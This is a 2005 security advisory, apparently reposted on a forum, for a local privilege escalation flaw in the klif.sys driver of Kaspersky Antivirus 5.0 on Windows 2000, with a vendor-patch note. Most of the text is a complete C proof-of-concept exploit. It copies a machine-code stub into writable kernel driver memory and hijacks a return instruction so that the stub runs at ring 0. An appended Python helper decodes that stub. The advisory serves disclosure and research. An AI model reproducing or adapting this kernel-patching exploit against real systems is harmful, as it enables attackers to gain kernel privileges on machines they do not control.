Title: Kaspersky Antivirus klif.sys privilege escalation vulnerability
Author: Jesse
Time: 2005-6-10 19:00
Affected systems:
Kaspersky Labs Kaspersky Antivirus 5.0.335
Kaspersky Labs Kaspersky Antivirus 5.0.228
Kaspersky Labs Kaspersky Antivirus 5.0.227

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 13878

Kaspersky is a very popular antivirus product.

Kaspersky software on the Microsoft Windows 2000 platform has a design flaw that a local attacker may be able to exploit to elevate their privileges.

The cause is that the Kaspersky kernel driver klif.sys does not correctly drop its high privileges; an attacker may be able to exploit this to execute arbitrary code with kernel privileges.

<*Source: Ilya Rabinovich (info@softsphere.com)
  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111817777430401&w=2
*>

Test method:
--------------------------------------------------------------------------------

Warning: the following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!

//(C) by Ilya Rabinovich.
#include <windows.h>

PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;      //where the ring-0 stub is placed
PDWORD pJmpAddress=(PDWORD)0xBE9372B0;    //holds the stub address for the indirect jmp
PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046}; //candidate "retn 4" locations in klif.sys
PUCHAR pKAVRet;

unsigned char code[]={
    0x68,0x00,0x02,0x00,0x00,  //push 0x200
    0x68,0x00,0x80,0x93,0xBE,  //push 0xBE938000
    0x6A,0x00,                 //push 0
    0xB8,0x00,0x00,0x00,0x00,  //mov eax,GetModuleFileNameA (address patched in at +13)
    0xFF,0xD0,                 //call eax
    0x68,0x00,0x80,0x93,0xBE,  //push 0xBE938000
    0x68,0x00,0x82,0x93,0xBE,  //push 0xBE938200
    0xB8,0x00,0x00,0x00,0x00,  //mov eax,lstrcmpiA (address patched in at +30)
    0xFF,0xD0,                 //call eax
    0x85,0xC0,                 //test eax,eax
    0x74,0x03,                 //je +03
    0xC2,0x04,0x00,            //retn 4
    0x6A,0x00,                 //push 0
    0x68,0x00,0x84,0x93,0xBE,  //push 0xBE938400
    0x68,0x00,0x84,0x93,0xBE,  //push 0xBE938400
    0x6A,0x00,                 //push 0
    0xB8,0x00,0x00,0x00,0x00,  //mov eax,MessageBoxA (address patched in at +58)
    0xFF,0xD0,                 //call eax
    0xC2,0x04,0x00             //retn 4
};
unsigned char jmp_code[]={0xFF,0x25,0xB0,0x72,0x93,0xBE}; //jmp dword ptr [0xBE9372B0]

//////////////////////////////////////////////////////////////
BOOLEAN LoadExploitIntoKernelMemory(void){
    //Get function's addresses
    HANDLE hKernel=GetModuleHandle("KERNEL32.DLL");
    HANDLE hUser=GetModuleHandle("USER32.DLL");
    FARPROC pGetModuleFileNameA=GetProcAddress(hKernel,"GetModuleFileNameA");
    FARPROC plstrcmpiA=GetProcAddress(hKernel,"lstrcmpiA");
    FARPROC pMessageBoxA=GetProcAddress(hUser,"MessageBoxA");
    *(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA;
    *(DWORD*)(code+30)=(DWORD)plstrcmpiA;
    *(DWORD*)(code+58)=(DWORD)pMessageBoxA;
    //Prepare our data into ring0-zone.
    PCHAR pNotepadName=(PCHAR)0xBE938200;
    char temp_buffer[MAX_PATH];
    char *s;
    SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);
    lstrcpy(pNotepadName,temp_buffer);
    PCHAR pMessage=(PCHAR)0xBE938400;
    lstrcpy(pMessage,"Notepad is running!!! KAV is vulnerable!!!");
    //The driver's memory is writable from user mode: copy the stub in and
    //replace the driver's "retn 4" with a jmp into it.
    memmove(pCodeBase,code,sizeof(code));
    *pJmpAddress=(DWORD)pCodeBase;
    memmove(pKAVRet,jmp_code,sizeof(jmp_code));
    return TRUE;
}
///////////////////////////////////////////////////////////////
void UnloadExploitFromKernelMemory(){
    //Restore the original "retn 4".
    UCHAR retn_4[]={0xC2,0x04,0x00};
    memmove(pKAVRet,retn_4,sizeof(retn_4));
}
/////////////////////////////////////////////////////////////////
PUCHAR GetKAVRetAddress(void){
    //Check the retn 4 in the KAV 0xBE9334E1 function end
    //Also, we check the KAV klif.sys existence.
    UCHAR retn_4[]={0xC2,0x04,0x00};
    __try{
        for(DWORD i=0;i<sizeof(pKAVRets)/sizeof(pKAVRets[0]);i++){
            if(memcmp(pKAVRets[i],retn_4,sizeof(retn_4))==0) return pKAVRets[i];
        }
    }__except(EXCEPTION_EXECUTE_HANDLER){
        //The address is not mapped: the driver is not loaded.
        MessageBox(NULL,"KAV is not installed",NULL,0);
        return NULL;
    }
    MessageBox(NULL,"Wrong KAV version. You need 5.0.227, 5.0.228 or 5.0.335 versions of KAV",NULL,0);
    return NULL;
}
/////////////////////////////////////////////////////////////////
void main(void){
    pKAVRet=GetKAVRetAddress();
    if(NULL==pKAVRet) return;
    if(!LoadExploitIntoKernelMemory()) return;
    char temp_buffer[MAX_PATH];
    char *s;
    SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);
    PROCESS_INFORMATION pi;
    STARTUPINFO si={0};
    si.cb=sizeof(si);
    CreateProcess(NULL,temp_buffer,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi);
    WaitForSingleObject(pi.hProcess,INFINITE);
    MessageBox(NULL,"Now you may start your own Notepad instance to check this exploit!","KAV_EXPLOITER",0);
    MessageBox(NULL,"Close this window to stop exploitation","KAV_EXPLOITER",0);
    UnloadExploitFromKernelMemory();
}

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Kaspersky Labs
--------------
The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

http://www.kaspersky.com/
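As an added analysis aid (not part of Ilya Rabinovich's PoC or of the advisory), the Python below decodes the ring-0 stub from the code[] array above and checks that the three offsets the loader writes API addresses to (code+13, code+30, code+58) are exactly the imm32 operands of the mov eax instructions; it also resolves the je +03 target, showing that a matching file name skips the retn 4 and reaches the MessageBoxA call.

```python
# Added analysis helper (not part of the PoC): decode the ring-0 stub from
# code[] and confirm the loader's patch offsets land on `mov eax,imm32` operands.
STUB = bytes([                            # copied from the PoC's code[] array
    0x68, 0x00, 0x02, 0x00, 0x00,         # push 0x200
    0x68, 0x00, 0x80, 0x93, 0xBE,         # push 0xBE938000
    0x6A, 0x00,                           # push 0
    0xB8, 0x00, 0x00, 0x00, 0x00,         # mov eax,imm32 (GetModuleFileNameA, patched at +13)
    0xFF, 0xD0,                           # call eax
    0x68, 0x00, 0x80, 0x93, 0xBE,         # push 0xBE938000
    0x68, 0x00, 0x82, 0x93, 0xBE,         # push 0xBE938200
    0xB8, 0x00, 0x00, 0x00, 0x00,         # mov eax,imm32 (lstrcmpiA, patched at +30)
    0xFF, 0xD0,                           # call eax
    0x85, 0xC0,                           # test eax,eax
    0x74, 0x03,                           # je +3: names equal -> skip the retn 4
    0xC2, 0x04, 0x00,                     # retn 4
    0x6A, 0x00,                           # push 0
    0x68, 0x00, 0x84, 0x93, 0xBE,         # push 0xBE938400
    0x68, 0x00, 0x84, 0x93, 0xBE,         # push 0xBE938400
    0x6A, 0x00,                           # push 0
    0xB8, 0x00, 0x00, 0x00, 0x00,         # mov eax,imm32 (MessageBoxA, patched at +58)
    0xFF, 0xD0,                           # call eax
    0xC2, 0x04, 0x00,                     # retn 4
])

def decode(stub):
    """Decode only the opcodes the stub uses -> [(offset, text, imm32_offset_or_None)]."""
    out, i = [], 0
    while i < len(stub):
        op, nxt = stub[i], stub[i:i + 2]
        if op == 0x68:                    # push imm32
            out.append((i, "push 0x%08X" % int.from_bytes(stub[i+1:i+5], "little"), None)); i += 5
        elif op == 0x6A:                  # push imm8
            out.append((i, "push %d" % stub[i + 1], None)); i += 2
        elif op == 0xB8:                  # mov eax,imm32: the operand the loader patches is at i+1
            out.append((i, "mov eax,imm32", i + 1)); i += 5
        elif nxt == b"\xff\xd0":
            out.append((i, "call eax", None)); i += 2
        elif nxt == b"\x85\xc0":
            out.append((i, "test eax,eax", None)); i += 2
        elif op == 0x74:                  # je rel8, relative to the next instruction
            out.append((i, "je 0x%02X" % (i + 2 + stub[i + 1]), None)); i += 2
        elif op == 0xC2:                  # retn imm16
            out.append((i, "retn %d" % int.from_bytes(stub[i+1:i+3], "little"), None)); i += 3
        else: raise ValueError("unexpected opcode 0x%02X at offset %d" % (op, i))
    return out

def patch_offsets(stub):
    # Offsets that must receive the three API addresses; expected [13, 30, 58].
    return [imm for _, _, imm in decode(stub) if imm is not None]
```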
Welcome to 黑色海岸线论坛 (http://bbs.thysea.com/)